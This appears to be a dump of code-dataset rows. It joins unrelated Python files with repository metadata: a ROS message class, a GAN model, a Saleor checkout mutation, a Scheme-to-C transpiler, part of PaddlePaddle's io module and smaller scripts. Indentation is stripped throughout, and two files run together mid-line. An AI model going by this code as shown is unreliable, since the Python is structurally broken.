logfile = 'script_list.log' # Set the variable logfile
path = os.getenv("scripts") # Set the varable path by getting the value from the OS environment variable scripts - 1.2
#path = (raw_input("Enter dir: ")) # Ask the user for the directory to scan
logfilename = os.path.join(logdir, logfile) # Set the variable logfilename by joining logdir and logfile together
log = open(logfilename, 'w') # Set the variable log and open the logfile for writing
for dirpath, dirname, filenames in os.walk(path): # Go through the directories and the subdirectories
for filename in filenames: # Get all the filenames
log.write(os.path.join(dirpath, filename)+'\n') # Write the full path out to the logfile
print ("\nYour logfile " , logfilename, "has been created") # Small message informing the user the file has been createdimport numpy as np
import cv2
cap = cv2.VideoCapture(0)
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
# Our operations on the frame come here
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Display the resulting frame
cv2.imshow('frame',gray)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows() | [
"[email protected]"
] | |
38e8edcda1840554a4bd8c5716370d8c2e60b1b9 | d04c8d0b8edb5ec06926b35d96bd995245b3b997 | /courseEra1/bin/pip3.5 | 0526a43b2020d4bc760f27fa2c1d14d3672bc537 | [] | no_license | thesharpshooter/algo | e2c836bed68f3455c4f6a63464c0f7bf17046a50 | 335f0b1621acb53ac058716953b69d8f5df9a925 | refs/heads/master | 2021-01-12T05:31:12.063742 | 2017-02-07T17:42:56 | 2017-02-07T17:42:56 | 77,942,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | 5 | #!/Users/silicon/Desktop/algo/courseEra1/bin/python3.5
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | |
5eedc1be3759f58a0165ca8beeea10d2d67d05cc | 4bab98acf65c4625a8b3c757327a8a386f90dd32 | /ros2-windows/Lib/site-packages/geometry_msgs/msg/_quaternion.py | 012d2c21882f9d81a43e5720d9d1c8ee58681265 | [] | no_license | maojoejoe/Peach-Thinning-GTRI-Agricultural-Robotics-VIP | e2afb08b8d7b3ac075e071e063229f76b25f883a | 8ed707edb72692698f270317113eb215b57ae9f9 | refs/heads/master | 2023-01-15T06:00:22.844468 | 2020-11-25T04:16:15 | 2020-11-25T04:16:15 | 289,108,482 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,369 | py | # generated from rosidl_generator_py/resource/_idl.py.em
# with input from geometry_msgs:msg\Quaternion.idl
# generated code does not contain a copyright notice
# Import statements for member types
import rosidl_parser.definition # noqa: E402, I100
class Metaclass_Quaternion(type):
"""Metaclass of message 'Quaternion'."""
_CREATE_ROS_MESSAGE = None
_CONVERT_FROM_PY = None
_CONVERT_TO_PY = None
_DESTROY_ROS_MESSAGE = None
_TYPE_SUPPORT = None
__constants = {
}
@classmethod
def __import_type_support__(cls):
try:
from rosidl_generator_py import import_type_support
module = import_type_support('geometry_msgs')
except ImportError:
import logging
import traceback
logger = logging.getLogger(
'geometry_msgs.msg.Quaternion')
logger.debug(
'Failed to import needed modules for type support:\n' +
traceback.format_exc())
else:
cls._CREATE_ROS_MESSAGE = module.create_ros_message_msg__msg__quaternion
cls._CONVERT_FROM_PY = module.convert_from_py_msg__msg__quaternion
cls._CONVERT_TO_PY = module.convert_to_py_msg__msg__quaternion
cls._TYPE_SUPPORT = module.type_support_msg__msg__quaternion
cls._DESTROY_ROS_MESSAGE = module.destroy_ros_message_msg__msg__quaternion
@classmethod
def __prepare__(cls, name, bases, **kwargs):
# list constant names here so that they appear in the help text of
# the message class under "Data and other attributes defined here:"
# as well as populate each message instance
return {
'X__DEFAULT': 0.0,
'Y__DEFAULT': 0.0,
'Z__DEFAULT': 0.0,
'W__DEFAULT': 1.0,
}
@property
def X__DEFAULT(cls):
"""Return default value for message field 'x'."""
return 0.0
@property
def Y__DEFAULT(cls):
"""Return default value for message field 'y'."""
return 0.0
@property
def Z__DEFAULT(cls):
"""Return default value for message field 'z'."""
return 0.0
@property
def W__DEFAULT(cls):
"""Return default value for message field 'w'."""
return 1.0
class Quaternion(metaclass=Metaclass_Quaternion):
"""Message class 'Quaternion'."""
__slots__ = [
'_x',
'_y',
'_z',
'_w',
]
_fields_and_field_types = {
'x': 'double',
'y': 'double',
'z': 'double',
'w': 'double',
}
SLOT_TYPES = (
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
)
def __init__(self, **kwargs):
assert all('_' + key in self.__slots__ for key in kwargs.keys()), \
'Invalid arguments passed to constructor: %s' % \
', '.join(sorted(k for k in kwargs.keys() if '_' + k not in self.__slots__))
self.x = kwargs.get(
'x', Quaternion.X__DEFAULT)
self.y = kwargs.get(
'y', Quaternion.Y__DEFAULT)
self.z = kwargs.get(
'z', Quaternion.Z__DEFAULT)
self.w = kwargs.get(
'w', Quaternion.W__DEFAULT)
def __repr__(self):
typename = self.__class__.__module__.split('.')
typename.pop()
typename.append(self.__class__.__name__)
args = []
for s, t in zip(self.__slots__, self.SLOT_TYPES):
field = getattr(self, s)
fieldstr = repr(field)
# We use Python array type for fields that can be directly stored
# in them, and "normal" sequences for everything else. If it is
# a type that we store in an array, strip off the 'array' portion.
if (
isinstance(t, rosidl_parser.definition.AbstractSequence) and
isinstance(t.value_type, rosidl_parser.definition.BasicType) and
t.value_type.typename in ['float', 'double', 'int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', 'uint64']
):
if len(field) == 0:
fieldstr = '[]'
else:
assert fieldstr.startswith('array(')
prefix = "array('X', "
suffix = ')'
fieldstr = fieldstr[len(prefix):-len(suffix)]
args.append(s[1:] + '=' + fieldstr)
return '%s(%s)' % ('.'.join(typename), ', '.join(args))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
if self.x != other.x:
return False
if self.y != other.y:
return False
if self.z != other.z:
return False
if self.w != other.w:
return False
return True
@classmethod
def get_fields_and_field_types(cls):
from copy import copy
return copy(cls._fields_and_field_types)
@property
def x(self):
"""Message field 'x'."""
return self._x
@x.setter
def x(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'x' field must be of type 'float'"
self._x = value
@property
def y(self):
"""Message field 'y'."""
return self._y
@y.setter
def y(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'y' field must be of type 'float'"
self._y = value
@property
def z(self):
"""Message field 'z'."""
return self._z
@z.setter
def z(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'z' field must be of type 'float'"
self._z = value
@property
def w(self):
"""Message field 'w'."""
return self._w
@w.setter
def w(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'w' field must be of type 'float'"
self._w = value
| [
"[email protected]"
] | |
2befce3106817fc0f55d94063b2ac6ba3355720f | d8edd97f8f8dea3f9f02da6c40d331682bb43113 | /networks371.py | 69994056fe8fa748472cd893751fdb81bc410798 | [] | no_license | mdubouch/noise-gan | bdd5b2fff3aff70d5f464150443d51c2192eeafd | 639859ec4a2aa809d17eb6998a5a7d217559888a | refs/heads/master | 2023-07-15T09:37:57.631656 | 2021-08-27T11:02:45 | 2021-08-27T11:02:45 | 284,072,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,082 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
__version__ = 205
# Number of wires in the CDC
n_wires = 3606
# Number of continuous features (E, t, dca)
n_features = 3
class Gen(nn.Module):
def __init__(self, ngf, latent_dims, seq_len, encoded_dim):
super().__init__()
self.ngf = ngf
self.seq_len = seq_len
self.version = __version__
# Input: (B, latent_dims, 1)
self.act = nn.ReLU()
self.lin0 = nn.Linear(latent_dims, seq_len//64*1024, bias=True)
class GBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.convp = nn.ConvTranspose1d(in_channels, out_channels, 1, 1, 0)
self.convu = nn.ConvTranspose1d(in_channels, out_channels, 4, 2, 1)
self.conv1 = nn.ConvTranspose1d(out_channels, out_channels, 3, 1, 1)
self.bnu = nn.BatchNorm1d(out_channels)
self.bn1 = nn.BatchNorm1d(out_channels)
self.act = nn.ReLU()
def forward(self, x):
y0 = F.interpolate(self.convp(x), scale_factor=2, mode='nearest')
y = self.act(self.bnu(self.convu(x)))
y = self.act(y0 + self.bn1(self.conv1(y)))
return y
self.gb1 = GBlock(1024, 768)
self.gb2 = GBlock(768, 512)
self.gb3 = GBlock(512, 384)
self.gb4 = GBlock(384, 256)
self.gb5 = GBlock(256, 256)
self.gb6 = GBlock(256, 256)
self.convw1 = nn.ConvTranspose1d(256, 256, 3, 1, 1)
self.bnw1 = nn.InstanceNorm1d(256)
self.convw2 = nn.ConvTranspose1d(256, 256, 3, 1, 1)
self.bnw2 = nn.InstanceNorm1d(256)
self.convw3 = nn.ConvTranspose1d(256, n_wires, 3, 1, 1)
#self.bnp0 = nn.BatchNorm1d(n_wires)
self.convwp = nn.ConvTranspose1d(256, 64, 1, 1, 0)
self.convp1 = nn.ConvTranspose1d(2, 64, 3, 1, 1)
self.bnp1 = nn.BatchNorm1d(64)
self.convp2 = nn.ConvTranspose1d(64, 32, 3, 1, 1)
self.bnp2 = nn.BatchNorm1d(32)
self.convp3 = nn.ConvTranspose1d(32, n_features, 1, 1, 0)
self.out = nn.Tanh()
def forward(self, z, wire_to_xy):
# z: random point in latent space
x = self.act(self.lin0(z).view(-1, 1024, self.seq_len // 64))
x = self.gb1(x)
x = self.gb2(x)
x = self.gb3(x)
x = self.gb4(x)
x = self.gb5(x)
x = self.gb6(x)
w = self.bnw1(self.act(self.convw1(x)))
w = self.bnw2(self.act(self.convw2(w)))
w = self.convw3(w)
wg = F.gumbel_softmax(w, dim=1, hard=True, tau=2/3)
xy = torch.tensordot(wg, wire_to_xy, dims=[[1],[1]]).permute(0,2,1)
p = self.act(self.bnp1(self.convwp(x) + self.convp1(xy)))
p = self.act(self.bnp2(self.convp2(p)))
p = self.convp3(p)
return torch.cat([self.out(p), xy], dim=1), wg
class Disc(nn.Module):
def __init__(self, ndf, seq_len, encoded_dim):
super().__init__()
self.version = __version__
# (B, n_features, 256)
self.act = nn.LeakyReLU(0.2)
class DBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.convd = nn.Conv1d(in_channels, out_channels, 4, 2, 1)
self.act = nn.LeakyReLU(0.2)
def forward(self, x):
y = self.act(self.convd(x))
return y
self.conv0 = nn.Conv1d(2, 64, 1, 1, 0)
self.conv1 = nn.Conv1d(64, 128, 1, 1, 0)
self.conv2 = nn.Conv1d(128, 256, 1, 1, 0)
self.conv3 = nn.Conv1d(256, 256, 1, 1, 0)
self.conv4 = nn.Conv1d(256, 256, 1, 1, 0)
#self.lin0 = nn.Linear(256 * seq_len // 1, 1, bias=True)
self.convf = nn.Conv1d(256, 1, 1, 1, 0)
self.out = nn.Identity()
def forward(self, x_):
# x_ is concatenated tensor of p_ and w_, shape (batch, features+n_wires, seq_len)
# p_ shape is (batch, features, seq_len),
# w_ is AE-encoded wire (batch, encoded_dim, seq_len)
seq_len = x_.shape[2]
x = x_
#dist = ((xy - nn.ConstantPad1d((1, 0), 0.0)(xy[:,:,:-1]))**2).sum(dim=1).unsqueeze(1)
p = x[:,:n_features]
w = x[:,n_features:]
#x = torch.cat([p, w], dim=1)
x = self.act(self.conv0(w))
x = self.act(self.conv1(x))
x = self.act(self.conv2(x))
x = self.act(self.conv3(x))
x = self.act(self.conv4(x))
#x = self.lin0(x.flatten(1,2))
x = self.convf(x)
x = x.mean(2)
return self.out(x)#.squeeze(1)
class VAE(nn.Module):
def __init__(self, encoded_dim):
super().__init__()
class Enc(nn.Module):
def __init__(self, hidden_size):
super().__init__()
self.act = nn.LeakyReLU(0.2)
self.lin1 = nn.Linear(n_wires, hidden_size)
self.lin2 = nn.Linear(hidden_size, encoded_dim)
self.out = nn.Tanh()
def forward(self, x):
x = self.act(self.lin1(x))
return self.out(self.lin2(x))
class Dec(nn.Module):
def __init__(self, hidden_size):
super().__init__()
self.act = nn.ReLU()
self.lin1 = nn.Linear(encoded_dim, hidden_size)
self.lin2 = nn.Linear(hidden_size, n_wires)
def forward(self, x):
x = self.act(self.lin1(x))
return self.lin2(x)
self.enc_net = Enc(512)
self.dec_net = Dec(512)
def enc(self, x):
return self.enc_net(x.permute(0, 2, 1)).permute(0,2,1)
def dec(self, x):
return self.dec_net(x.permute(0, 2, 1)).permute(0,2,1)
def forward(self, x):
y = self.dec_net(self.enc_net(x))
return y
def get_n_params(model):
return sum(p.reshape(-1).shape[0] for p in model.parameters())
| [
"[email protected]"
] | |
c79fdf679e8dbf8e013d21dbb90d7bd6b3a07be2 | 84c4474a88a59da1e72d86b33b5326003f578271 | /saleor/graphql/checkout/mutations/checkout_line_delete.py | 68358da32752ad166cc6b8b7cdce9fa3ba1035cd | [
"BSD-3-Clause"
] | permissive | vineetb/saleor | 052bd416d067699db774f06453d942cb36c5a4b7 | b0d5ec1a55f2ceeba6f62cf15f53faea0adf93f9 | refs/heads/main | 2023-07-20T02:01:28.338748 | 2023-07-17T06:05:36 | 2023-07-17T06:05:36 | 309,911,573 | 0 | 0 | NOASSERTION | 2020-11-04T06:32:55 | 2020-11-04T06:32:55 | null | UTF-8 | Python | false | false | 2,754 | py | import graphene
from ....checkout.fetch import fetch_checkout_info, fetch_checkout_lines
from ....checkout.utils import invalidate_checkout_prices
from ....webhook.event_types import WebhookEventAsyncType
from ...core import ResolveInfo
from ...core.descriptions import ADDED_IN_34, DEPRECATED_IN_3X_INPUT
from ...core.doc_category import DOC_CATEGORY_CHECKOUT
from ...core.mutations import BaseMutation
from ...core.scalars import UUID
from ...core.types import CheckoutError
from ...core.utils import WebhookEventInfo
from ...plugins.dataloaders import get_plugin_manager_promise
from ..types import Checkout, CheckoutLine
from .utils import get_checkout, update_checkout_shipping_method_if_invalid
class CheckoutLineDelete(BaseMutation):
checkout = graphene.Field(Checkout, description="An updated checkout.")
class Arguments:
id = graphene.ID(
description="The checkout's ID." + ADDED_IN_34,
required=False,
)
token = UUID(
description=f"Checkout token.{DEPRECATED_IN_3X_INPUT} Use `id` instead.",
required=False,
)
checkout_id = graphene.ID(
required=False,
description=(
f"The ID of the checkout. {DEPRECATED_IN_3X_INPUT} Use `id` instead."
),
)
line_id = graphene.ID(description="ID of the checkout line to delete.")
class Meta:
description = "Deletes a CheckoutLine."
doc_category = DOC_CATEGORY_CHECKOUT
error_type_class = CheckoutError
error_type_field = "checkout_errors"
webhook_events_info = [
WebhookEventInfo(
type=WebhookEventAsyncType.CHECKOUT_UPDATED,
description="A checkout was updated.",
)
]
@classmethod
def perform_mutation( # type: ignore[override]
cls,
_root,
info: ResolveInfo,
/,
*,
checkout_id=None,
id=None,
line_id,
token=None,
):
checkout = get_checkout(cls, info, checkout_id=checkout_id, token=token, id=id)
line = cls.get_node_or_error(
info, line_id, only_type=CheckoutLine, field="line_id"
)
if line and line in checkout.lines.all():
line.delete()
manager = get_plugin_manager_promise(info.context).get()
lines, _ = fetch_checkout_lines(checkout)
checkout_info = fetch_checkout_info(checkout, lines, manager)
update_checkout_shipping_method_if_invalid(checkout_info, lines)
invalidate_checkout_prices(checkout_info, lines, manager, save=True)
cls.call_event(manager.checkout_updated, checkout)
return CheckoutLineDelete(checkout=checkout)
| [
"[email protected]"
] | |
d4077d7a3d2d6d62fed0c16b5ce02065c265119b | ecd25c36474ecf404a32f2f0096b5a6898e4c396 | /python_stack/django/django_fullstack/semi_restful_tvshows/semi_restful_tvshows_app/migrations/0001_initial.py | 68344c74cee04d8e0afc825cf43c38bae81458fc | [] | no_license | matthew-le/Coding_Dojo_Bootcamp | cd7b4aa8e231db372da05a0a5444114b07fbfabf | 6d433d5305d2d8f4ea485206895d8f84bedeb59d | refs/heads/main | 2023-06-13T23:05:23.827556 | 2021-07-23T23:56:35 | 2021-07-23T23:56:35 | 388,947,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 650 | py | # Generated by Django 2.2 on 2021-07-11 20:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Show',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('network', models.CharField(max_length=255)),
('release_date', models.DateTimeField()),
('desc', models.TextField()),
],
),
]
| [
"[email protected]"
] | |
b8749e25c58da9a903feb5edc84c2d6ed8ebda67 | 04b1803adb6653ecb7cb827c4f4aa616afacf629 | /third_party/blink/web_tests/external/wpt/bluetooth/generate_test.py | 881f7dbcb73af73b18b447f5cea142f53ba2fd36 | [
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] | permissive | Samsung/Castanets | 240d9338e097b75b3f669604315b06f7cf129d64 | 4896f732fc747dfdcfcbac3d442f2d2d42df264a | refs/heads/castanets_76_dev | 2023-08-31T09:01:04.744346 | 2021-07-30T04:56:25 | 2021-08-11T05:45:21 | 125,484,161 | 58 | 49 | BSD-3-Clause | 2022-10-16T19:31:26 | 2018-03-16T08:07:37 | null | UTF-8 | Python | false | false | 1,927 | py | #!/usr/bin/python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# TODO(50903): Delete the file in LayoutTests/bluetooth after all the tests have
# been migrated to this directory.
"""Test that the set of gen-* files is the same as the generated files."""
import fnmatch
import os
import sys
import generate
import logging
UPDATE_TIP = 'To update the generated tests, run:\n' \
'$ python third_party/WebKit/LayoutTests/bluetooth/generate.py'
def main():
logging.basicConfig(level=logging.INFO)
logging.info(UPDATE_TIP)
generated_files = set()
# Tests data in gen-* files is the same as the data generated.
for generated_test in generate.GetGeneratedTests():
generated_files.add(generated_test.path)
try:
with open(generated_test.path, 'r') as f:
data = f.read().decode('utf-8')
if data != generated_test.data:
logging.error('%s does not match template', generated_test.path)
return -1
except IOError, e:
if e.errno == 2:
logging.error('Missing generated test:\n%s\nFor template:\n%s',
generated_test.path,
generated_test.template)
return -1
# Tests that there are no obsolete generated files.
previous_generated_files = set()
current_path = os.path.dirname(os.path.realpath(__file__))
for root, _, filenames in os.walk(current_path):
for filename in fnmatch.filter(filenames, 'gen-*.https.html'):
previous_generated_files.add(os.path.join(root, filename))
if previous_generated_files != generated_files:
logging.error('There are extra generated tests. Please remove them.')
for test_path in previous_generated_files - generated_files:
logging.error('%s', test_path)
return -1
if __name__ == '__main__':
sys.exit(main())
| [
"[email protected]"
] | |
f4d3f9c392925ef0d5946029ba07286699ed8e90 | ed30d9b54ad58d2c134b465a3cb4008426aa6a72 | /Transpile/transform_expression.py | 48c255faed874ce20875362dc466e6685e7c4963 | [] | no_license | CaspianA1/S2CPP | b0a026356887f9e0590518db7f242cc8d97530fc | 808c426c2784018efd507b207702494ac85beef1 | refs/heads/master | 2022-12-07T06:50:41.560949 | 2020-09-06T19:56:00 | 2020-09-06T19:56:00 | 287,172,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,510 | py | # transform_expression.py
common_ends = {"+": "add", "-": "sub", "*": "mul", "/": "div"}
def function_is_present(function, scheme_expr):
for argument in scheme_expr:
if isinstance(argument, list):
return function_is_present(argument, scheme_expr)
elif argument == function:
return True
def make_c_expr(scheme_expr):
# if not isinstance(scheme_expr[0], str):
# return scheme_expr # for lists
c_expr = scheme_expr.pop(0) + "("
cast_to_floats = False
for index, argument in enumerate(scheme_expr):
if isinstance(argument, list):
c_expr += make_c_expr(argument)
if index != len(scheme_expr) - 1:
c_expr += ", "
# print("C expression:", c_expr)
else:
if isinstance(argument, int) and cast_to_floats:
scheme_expr[index] = float(argument)
elif isinstance(argument, float):
cast_to_floats = True
c_expr += str(scheme_expr[index])
if index != len(scheme_expr) - 1:
c_expr += ", "
return c_expr + ")"
def make_float_funcs(scheme_expr):
for index, argument in enumerate(scheme_expr):
if (isinstance(argument, float) and scheme_expr[0] in common_ends.keys()) or scheme_expr[0] == "/":
return True
elif isinstance(argument, list):
return make_float_funcs(argument)
return False
# applies only to built-in math functions that need va_args
def make_ints_to_doubles(scheme_expr):
for index, argument in enumerate(scheme_expr):
if index == 1:
continue
elif isinstance(argument, int):
scheme_expr[index] = float(argument) # still floating-point
elif isinstance(argument, list):
scheme_expr[index] = make_ints_to_doubles(argument)
return scheme_expr
def modify_operators(scheme_expr, make_float_operators):
for index, argument in enumerate(scheme_expr):
if isinstance(argument, list):
scheme_expr[index] = modify_operators(argument, make_float_operators)
elif index == 0 and (function := scheme_expr[0]) in common_ends.keys():
# modify the operators and make the arguments floats
scheme_expr[0] = common_ends[function]
if make_float_operators or function == "/":
make_ints_to_doubles(scheme_expr)
scheme_expr[0] += "_d"
return scheme_expr
if __name__ == "__main__":
# scheme_expr = ['define', 'f', ['lambda', ['x', 'y'], ['+', 'x', 'y', 1]]]
# scheme_expr = ['define', 'x', 5]
# scheme_expr = ['func', 5, ['*', 25, 14, ['/', 382, 90]]]
scheme_expr = ['define', 'x', 5]
scheme_expr = modify_operators(scheme_expr, make_float_funcs(scheme_expr))
c_expr = make_c_expr(scheme_expr)
print(c_expr)
| [
"[email protected]"
] | |
e07dde273c02119900fb16720a9652c7291bb2e1 | b722b5a07cf9596b251e0148dd4e2358e1174071 | /Intro to CS with Python/src/homework/listing1710.py | 6628163a46b23740dca568e28043d497846523d9 | [] | no_license | p3ngwen/open-notes | 7c894176ece3a1b8c2b1e2b336cdb3099d5d0f67 | 33679b64f5e77289798687337ef7db5503651c21 | refs/heads/master | 2023-07-08T02:43:59.431794 | 2021-08-10T16:34:56 | 2021-08-10T16:34:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 212 | py | import errno
try:
fp = open( "NotAFile" )
fp.close()
except IOError as ex:
if ex.args[0] == errno.ENOENT:
print( "File not found!" )
else:
print( ex.args[0], ex.args[1] ) | [
"[email protected]"
] | |
c6e064f8e29417bbaee52d1071fb497f39e5f4d3 | 0d5c77661f9d1e6783b1c047d2c9cdd0160699d1 | /python/paddle/fluid/layers/io.py | f3ab47c96b1caa2facfd6d191af014b4c7380cbc | [
"Apache-2.0"
] | permissive | xiaoyichao/anyq_paddle | ae68fabf1f1b02ffbc287a37eb6c0bcfbf738e7f | 6f48b8f06f722e3bc5e81f4a439968c0296027fb | refs/heads/master | 2022-10-05T16:52:28.768335 | 2020-03-03T03:28:50 | 2020-03-03T03:28:50 | 244,155,581 | 1 | 0 | Apache-2.0 | 2022-09-23T22:37:13 | 2020-03-01T13:36:58 | C++ | UTF-8 | Python | false | false | 28,325 | py | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
from .. import core
from ..framework import convert_np_dtype_to_dtype_, default_main_program, default_startup_program, Program
from ..unique_name import generate as unique_name
from control_flow import BlockGuard
from ..layer_helper import LayerHelper
from ..executor import global_scope
from layer_function_generator import generate_layer_fn, templatedoc
__all__ = [
'data', 'BlockGuardServ', 'ListenAndServ', 'Send', 'Recv',
'open_recordio_file', 'open_files', 'read_file', 'shuffle', 'batch',
'double_buffer', 'random_data_generator', 'Preprocessor', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This function takes in the input and based on whether data has
to be returned back as a minibatch, it creates the global variable by using
the helper functions. The global variables can be accessed by all the
following operators in the graph.
All the input variables of this function are passed in as local variables
to the LayerHelper constructor.
Args:
name(str): The name/alias of the function
shape(list): Tuple declaring the shape.
append_batch_size(bool): Whether or not to append the data as a batch.
dtype(int|float): The type of data : float32, float_16, int etc
type(VarType): The output type. By default it is LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
stop_gradient(bool): A boolean that mentions whether gradient should flow.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in xrange(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
ListenAndServ is used to create a rpc server bind and listen
on specific TCP port, this server will run the sub-block when
received variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
fan_in(int): how many client are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # did not support multiple optimize blocks in layers
'sync_mode': True, # did not support async now in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, sync=True):
"""
Send variables to the server side, and get vars from server
side when server have finished running server side program.
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait the request finish
"""
assert (type(send_vars) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(type="send_barrier", attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, sync=True):
"""
Receive variables from server side
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait the request finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": get_vars},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(type="fetch_barrier", attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
